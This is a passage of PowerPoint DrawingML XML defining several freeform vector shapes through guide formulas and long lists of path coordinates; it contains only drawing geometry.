                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="83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6" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6534150" y="1652588"/>
                <a:ext cx="293688" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 814"/>
                  <a:gd name="T1" fmla="*/ 89 h 810"/>
                  <a:gd name="T2" fmla="*/ 168 w 814"/>
                  <a:gd name="T3" fmla="*/ 441 h 810"/>
                  <a:gd name="T4" fmla="*/ 173 w 814"/>
                  <a:gd name="T5" fmla="*/ 441 h 810"/>
                  <a:gd name="T6" fmla="*/ 477 w 814"/>
                  <a:gd name="T7" fmla="*/ 178 h 810"/>
                  <a:gd name="T8" fmla="*/ 598 w 814"/>
                  <a:gd name="T9" fmla="*/ 278 h 810"/>
                  <a:gd name="T10" fmla="*/ 404 w 814"/>
                  <a:gd name="T11" fmla="*/ 630 h 810"/>
                  <a:gd name="T12" fmla="*/ 404 w 814"/>
                  <a:gd name="T13" fmla="*/ 630 h 810"/>
                  <a:gd name="T14" fmla="*/ 708 w 814"/>
                  <a:gd name="T15" fmla="*/ 368 h 810"/>
                  <a:gd name="T16" fmla="*/ 813 w 814"/>
                  <a:gd name="T17" fmla="*/ 457 h 810"/>
                  <a:gd name="T18" fmla="*/ 367 w 814"/>
                  <a:gd name="T19" fmla="*/ 809 h 810"/>
                  <a:gd name="T20" fmla="*/ 241 w 814"/>
                  <a:gd name="T21" fmla="*/ 709 h 810"/>
                  <a:gd name="T22" fmla="*/ 435 w 814"/>
                  <a:gd name="T23" fmla="*/ 352 h 810"/>
                  <a:gd name="T24" fmla="*/ 435 w 814"/>
                  <a:gd name="T25" fmla="*/ 352 h 810"/>
                  <a:gd name="T26" fmla="*/ 125 w 814"/>
                  <a:gd name="T27" fmla="*/ 614 h 810"/>
                  <a:gd name="T28" fmla="*/ 0 w 814"/>
                  <a:gd name="T29" fmla="*/ 509 h 810"/>
                  <a:gd name="T30" fmla="*/ 262 w 814"/>
                  <a:gd name="T31" fmla="*/ 0 h 810"/>
                  <a:gd name="T32" fmla="*/ 372 w 814"/>
                  <a:gd name="T33" fmla="*/ 89 h 8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14" h="810">
                    <a:moveTo>
                      <a:pt x="372" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89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7" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6729413" y="1862138"/>
                <a:ext cx="203200" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 221 w 563"/>
                  <a:gd name="T1" fmla="*/ 43 h 558"/>
                  <a:gd name="T2" fmla="*/ 310 w 563"/>
                  <a:gd name="T3" fmla="*/ 6 h 558"/>
                  <a:gd name="T4" fmla="*/ 357 w 563"/>
                  <a:gd name="T5" fmla="*/ 0 h 558"/>
                  <a:gd name="T6" fmla="*/ 400 w 563"/>
                  <a:gd name="T7" fmla="*/ 11 h 558"/>
                  <a:gd name="T8" fmla="*/ 489 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 558"/>
                  <a:gd name="T10" fmla="*/ 525 w 563"/>
                  <a:gd name="T11" fmla="*/ 117 h 558"/>
                  <a:gd name="T12" fmla="*/ 551 w 563"/>
                  <a:gd name="T13" fmla="*/ 158 h 558"/>
                  <a:gd name="T14" fmla="*/ 562 w 563"/>
                  <a:gd name="T15" fmla="*/ 200 h 558"/>
                  <a:gd name="T16" fmla="*/ 562 w 563"/>
                  <a:gd name="T17" fmla="*/ 247 h 558"/>
                  <a:gd name="T18" fmla="*/ 547 w 563"/>
                  <a:gd name="T19" fmla="*/ 290 h 558"/>
                  <a:gd name="T20" fmla="*/ 520 w 563"/>
                  <a:gd name="T21" fmla="*/ 337 h 558"/>
                  <a:gd name="T22" fmla="*/ 436 w 563"/>
                  <a:gd name="T23" fmla="*/ 437 h 558"/>
                  <a:gd name="T24" fmla="*/ 389 w 563"/>
                  <a:gd name="T25" fmla="*/ 484 h 558"/>
                  <a:gd name="T26" fmla="*/ 342 w 563"/>
                  <a:gd name="T27" fmla="*/ 521 h 558"/>
                  <a:gd name="T28" fmla="*/ 253 w 563"/>
                  <a:gd name="T29" fmla="*/ 557 h 558"/>
                  <a:gd name="T30" fmla="*/ 205 w 563"/>
                  <a:gd name="T31" fmla="*/ 557 h 558"/>
                  <a:gd name="T32" fmla="*/ 163 w 563"/>
                  <a:gd name="T33" fmla="*/ 547 h 558"/>
                  <a:gd name="T34" fmla="*/ 79 w 563"/>
                  <a:gd name="T35" fmla="*/ 489 h 558"/>
                  <a:gd name="T36" fmla="*/ 37 w 563"/>
                  <a:gd name="T37" fmla="*/ 447 h 558"/>
                  <a:gd name="T38" fmla="*/ 11 w 563"/>
                  <a:gd name="T39" fmla="*/ 400 h 558"/>
                  <a:gd name="T40" fmla="*/ 0 w 563"/>
                  <a:gd name="T41" fmla="*/ 358 h 558"/>
                  <a:gd name="T42" fmla="*/ 0 w 563"/>
                  <a:gd name="T43" fmla="*/ 316 h 558"/>
                  <a:gd name="T44" fmla="*/ 16 w 563"/>
                  <a:gd name="T45" fmla="*/ 274 h 558"/>
                  <a:gd name="T46" fmla="*/ 43 w 563"/>
                  <a:gd name="T47" fmla="*/ 227 h 558"/>
                  <a:gd name="T48" fmla="*/ 121 w 563"/>
                  <a:gd name="T49" fmla="*/ 127 h 558"/>
                  <a:gd name="T50" fmla="*/ 174 w 563"/>
                  <a:gd name="T51" fmla="*/ 80 h 558"/>
                  <a:gd name="T52" fmla="*/ 174 w 563"/>
                  <a:gd name="T53" fmla="*/ 284 h 558"/>
                  <a:gd name="T54" fmla="*/ 153 w 563"/>
                  <a:gd name="T55" fmla="*/ 311 h 558"/>
                  <a:gd name="T56" fmla="*/ 137 w 563"/>
                  <a:gd name="T57" fmla="*/ 337 h 558"/>
                  <a:gd name="T58" fmla="*/ 121 w 563"/>
                  <a:gd name="T59" fmla="*/ 384 h 558"/>
                  <a:gd name="T60" fmla="*/ 127 w 563"/>
                  <a:gd name="T61" fmla="*/ 400 h 558"/>
                  <a:gd name="T62" fmla="*/ 142 w 563"/>
                  <a:gd name="T63" fmla="*/ 421 h 558"/>
                  <a:gd name="T64" fmla="*/ 179 w 563"/>
                  <a:gd name="T65" fmla="*/ 437 h 558"/>
                  <a:gd name="T66" fmla="*/ 216 w 563"/>
                  <a:gd name="T67" fmla="*/ 431 h 558"/>
                  <a:gd name="T68" fmla="*/ 242 w 563"/>
                  <a:gd name="T69" fmla="*/ 415 h 558"/>
                  <a:gd name="T70" fmla="*/ 337 w 563"/>
                  <a:gd name="T71" fmla="*/ 337 h 558"/>
                  <a:gd name="T72" fmla="*/ 394 w 563"/>
                  <a:gd name="T73" fmla="*/ 268 h 558"/>
                  <a:gd name="T74" fmla="*/ 431 w 563"/>
                  <a:gd name="T75" fmla="*/ 216 h 558"/>
                  <a:gd name="T76" fmla="*/ 436 w 563"/>
                  <a:gd name="T77" fmla="*/ 195 h 558"/>
                  <a:gd name="T78" fmla="*/ 431 w 563"/>
                  <a:gd name="T79" fmla="*/ 158 h 558"/>
                  <a:gd name="T80" fmla="*/ 421 w 563"/>
                  <a:gd name="T81" fmla="*/ 143 h 558"/>
                  <a:gd name="T82" fmla="*/ 378 w 563"/>
                  <a:gd name="T83" fmla="*/ 121 h 558"/>
                  <a:gd name="T84" fmla="*/ 357 w 563"/>
                  <a:gd name="T85" fmla="*/ 127 h 558"/>
                  <a:gd name="T86" fmla="*/ 331 w 563"/>
                  <a:gd name="T87" fmla="*/ 132 h 558"/>
                  <a:gd name="T88" fmla="*/ 284 w 563"/>
                  <a:gd name="T89" fmla="*/ 174 h 558"/>
                  <a:gd name="T90" fmla="*/ 226 w 563"/>
                  <a:gd name="T91" fmla="*/ 227 h 558"/>
                  <a:gd name="T92" fmla="*/ 174 w 563"/>
                  <a:gd name="T93" fmla="*/ 284 h 5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563" h="558">
                    <a:moveTo>
                      <a:pt x="221" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="284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8" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6834188" y="1976438"/>
                <a:ext cx="223837" cy="173037"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 509 w 621"/>
                  <a:gd name="T1" fmla="*/ 99 h 479"/>
                  <a:gd name="T2" fmla="*/ 452 w 621"/>
                  <a:gd name="T3" fmla="*/ 147 h 479"/>
                  <a:gd name="T4" fmla="*/ 452 w 621"/>
                  <a:gd name="T5" fmla="*/ 152 h 479"/>
                  <a:gd name="T6" fmla="*/ 452 w 621"/>
                  <a:gd name="T7" fmla="*/ 152 h 479"/>
                  <a:gd name="T8" fmla="*/ 499 w 621"/>
                  <a:gd name="T9" fmla="*/ 147 h 479"/>
                  <a:gd name="T10" fmla="*/ 536 w 621"/>
                  <a:gd name="T11" fmla="*/ 147 h 479"/>
                  <a:gd name="T12" fmla="*/ 536 w 621"/>
                  <a:gd name="T13" fmla="*/ 147 h 479"/>
                  <a:gd name="T14" fmla="*/ 556 w 621"/>
                  <a:gd name="T15" fmla="*/ 152 h 479"/>
                  <a:gd name="T16" fmla="*/ 573 w 621"/>
                  <a:gd name="T17" fmla="*/ 162 h 479"/>
                  <a:gd name="T18" fmla="*/ 588 w 621"/>
                  <a:gd name="T19" fmla="*/ 173 h 479"/>
                  <a:gd name="T20" fmla="*/ 604 w 621"/>
                  <a:gd name="T21" fmla="*/ 189 h 479"/>
                  <a:gd name="T22" fmla="*/ 604 w 621"/>
                  <a:gd name="T23" fmla="*/ 189 h 479"/>
                  <a:gd name="T24" fmla="*/ 614 w 621"/>
                  <a:gd name="T25" fmla="*/ 194 h 479"/>
                  <a:gd name="T26" fmla="*/ 614 w 621"/>
                  <a:gd name="T27" fmla="*/ 194 h 479"/>
                  <a:gd name="T28" fmla="*/ 620 w 621"/>
                  <a:gd name="T29" fmla="*/ 210 h 479"/>
                  <a:gd name="T30" fmla="*/ 520 w 621"/>
                  <a:gd name="T31" fmla="*/ 299 h 479"/>
                  <a:gd name="T32" fmla="*/ 520 w 621"/>
                  <a:gd name="T33" fmla="*/ 299 h 479"/>
                  <a:gd name="T34" fmla="*/ 504 w 621"/>
                  <a:gd name="T35" fmla="*/ 283 h 479"/>
                  <a:gd name="T36" fmla="*/ 504 w 621"/>
                  <a:gd name="T37" fmla="*/ 283 h 479"/>
                  <a:gd name="T38" fmla="*/ 494 w 621"/>
                  <a:gd name="T39" fmla="*/ 262 h 479"/>
                  <a:gd name="T40" fmla="*/ 494 w 621"/>
                  <a:gd name="T41" fmla="*/ 262 h 479"/>
                  <a:gd name="T42" fmla="*/ 462 w 621"/>
                  <a:gd name="T43" fmla="*/ 241 h 479"/>
                  <a:gd name="T44" fmla="*/ 462 w 621"/>
                  <a:gd name="T45" fmla="*/ 241 h 479"/>
                  <a:gd name="T46" fmla="*/ 446 w 621"/>
                  <a:gd name="T47" fmla="*/ 231 h 479"/>
                  <a:gd name="T48" fmla="*/ 426 w 621"/>
                  <a:gd name="T49" fmla="*/ 225 h 479"/>
                  <a:gd name="T50" fmla="*/ 426 w 621"/>
                  <a:gd name="T51" fmla="*/ 225 h 479"/>
                  <a:gd name="T52" fmla="*/ 409 w 621"/>
                  <a:gd name="T53" fmla="*/ 225 h 479"/>
                  <a:gd name="T54" fmla="*/ 389 w 621"/>
                  <a:gd name="T55" fmla="*/ 231 h 479"/>
                  <a:gd name="T56" fmla="*/ 389 w 621"/>
                  <a:gd name="T57" fmla="*/ 231 h 479"/>
                  <a:gd name="T58" fmla="*/ 368 w 621"/>
                  <a:gd name="T59" fmla="*/ 236 h 479"/>
                  <a:gd name="T60" fmla="*/ 347 w 621"/>
                  <a:gd name="T61" fmla="*/ 252 h 479"/>
                  <a:gd name="T62" fmla="*/ 95 w 621"/>
                  <a:gd name="T63" fmla="*/ 478 h 479"/>
                  <a:gd name="T64" fmla="*/ 0 w 621"/>
                  <a:gd name="T65" fmla="*/ 372 h 479"/>
                  <a:gd name="T66" fmla="*/ 415 w 621"/>
                  <a:gd name="T67" fmla="*/ 0 h 479"/>
                  <a:gd name="T68" fmla="*/ 509 w 621"/>
                  <a:gd name="T69" fmla="*/ 99 h 4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21" h="479">
                    <a:moveTo>
                      <a:pt x="509" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="99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9" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6913563" y="2030413"/>
                <a:ext cx="258762" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 362 w 720"/>
                  <a:gd name="T1" fmla="*/ 357 h 836"/>
                  <a:gd name="T2" fmla="*/ 367 w 720"/>
                  <a:gd name="T3" fmla="*/ 362 h 836"/>
                  <a:gd name="T4" fmla="*/ 619 w 720"/>
                  <a:gd name="T5" fmla="*/ 341 h 836"/>
                  <a:gd name="T6" fmla="*/ 719 w 720"/>
                  <a:gd name="T7" fmla="*/ 467 h 836"/>
                  <a:gd name="T8" fmla="*/ 446 w 720"/>
                  <a:gd name="T9" fmla="*/ 478 h 836"/>
                  <a:gd name="T10" fmla="*/ 299 w 720"/>
                  <a:gd name="T11" fmla="*/ 835 h 836"/>
                  <a:gd name="T12" fmla="*/ 199 w 720"/>
                  <a:gd name="T13" fmla="*/ 709 h 836"/>
                  <a:gd name="T14" fmla="*/ 305 w 720"/>
                  <a:gd name="T15" fmla="*/ 473 h 836"/>
                  <a:gd name="T16" fmla="*/ 220 w 720"/>
                  <a:gd name="T17" fmla="*/ 478 h 836"/>
                  <a:gd name="T18" fmla="*/ 89 w 720"/>
                  <a:gd name="T19" fmla="*/ 577 h 836"/>
                  <a:gd name="T20" fmla="*/ 0 w 720"/>
                  <a:gd name="T21" fmla="*/ 467 h 836"/>
                  <a:gd name="T22" fmla="*/ 582 w 720"/>
                  <a:gd name="T23" fmla="*/ 0 h 836"/>
                  <a:gd name="T24" fmla="*/ 672 w 720"/>
                  <a:gd name="T25" fmla="*/ 116 h 836"/>
                  <a:gd name="T26" fmla="*/ 362 w 720"/>
                  <a:gd name="T27" fmla="*/ 357 h 8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20" h="836">
                    <a:moveTo>
                      <a:pt x="362" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="367" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="357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0" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7096125" y="2289175"/>
                <a:ext cx="271463" cy="239713"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 752"/>
                  <a:gd name="T1" fmla="*/ 368 h 668"/>
                  <a:gd name="T2" fmla="*/ 131 w 752"/>
                  <a:gd name="T3" fmla="*/ 399 h 668"/>
                  <a:gd name="T4" fmla="*/ 131 w 752"/>
                  <a:gd name="T5" fmla="*/ 436 h 668"/>
                  <a:gd name="T6" fmla="*/ 152 w 752"/>
                  <a:gd name="T7" fmla="*/ 483 h 668"/>
                  <a:gd name="T8" fmla="*/ 200 w 752"/>
                  <a:gd name="T9" fmla="*/ 520 h 668"/>
                  <a:gd name="T10" fmla="*/ 237 w 752"/>
                  <a:gd name="T11" fmla="*/ 525 h 668"/>
                  <a:gd name="T12" fmla="*/ 273 w 752"/>
                  <a:gd name="T13" fmla="*/ 510 h 668"/>
                  <a:gd name="T14" fmla="*/ 310 w 752"/>
                  <a:gd name="T15" fmla="*/ 478 h 668"/>
                  <a:gd name="T16" fmla="*/ 326 w 752"/>
                  <a:gd name="T17" fmla="*/ 441 h 668"/>
                  <a:gd name="T18" fmla="*/ 326 w 752"/>
                  <a:gd name="T19" fmla="*/ 394 h 668"/>
                  <a:gd name="T20" fmla="*/ 299 w 752"/>
                  <a:gd name="T21" fmla="*/ 279 h 668"/>
                  <a:gd name="T22" fmla="*/ 294 w 752"/>
                  <a:gd name="T23" fmla="*/ 195 h 668"/>
